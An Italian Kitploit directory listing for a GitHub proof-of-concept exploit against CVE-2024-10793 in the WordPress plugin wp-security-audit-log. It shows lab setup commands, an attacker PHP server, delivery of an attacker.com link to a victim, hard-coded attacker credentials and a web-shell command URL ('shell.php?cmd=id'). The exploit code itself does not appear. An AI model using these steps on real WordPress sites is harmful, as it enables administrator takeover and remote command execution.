Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-10793 — Exploit proof-of-concept per CVE-2024-10793 che mira al plugin WordPress wp-security-audit-log. Dimostra account takeover, creazione di utenti privilegiati, upload di shell e manipolazione admin tramite richieste HTTP modificate. | Kitploit
Strumenti/GitHubGitHub/mahajian/cve-2024-10793
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebSviluppo Payload
GitHubmahajian/cve-2024-10793

CVE-2024-10793

Exploit proof-of-concept per CVE-2024-10793 che mira al plugin WordPress wp-security-audit-log. Dimostra account takeover, creazione di utenti privilegiati, upload di shell e manipolazione admin tramite richieste HTTP modificate.

Vedi Repository
2111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-10793 PoC

Aggiungi queste righe al tuo file hosts:

root@kitploit:~
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

Avvia Wordpress usando docker:

root@kitploit:~
$ sudo systemctl start docker
$ sudo docker-compose up -d

Apri http://goodcms.lab:2121 e segui i passaggi di installazione di wordpress. Installa wp-security-audit-log.5.2.1 o versioni precedenti in wordpress.

Avvia il server dell'attaccante:

root@kitploit:~
$ php -S 0:9091 -t ./exploit

Consegna http://attacker.com alla vittima e Bingo!

Impatti dell'exploit:

  • Aggiungi un utente privilegiato.
  • Modifica il profilo dell'amministratore corrente
  • Elimina tutti gli amministratori tranne l'hacker :)
  • Shell Upload
  • Logout

alt text

Account Takeover e creazione di un utente privilegiato Poc: Credenziali dell'attaccante dopo l'exploit: { email: [email protected], username: amin, password: 123456 } (Puoi modificarle nel codice xpl.js.)

Esegui il comando shell: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

alt text

Scarica lo strumento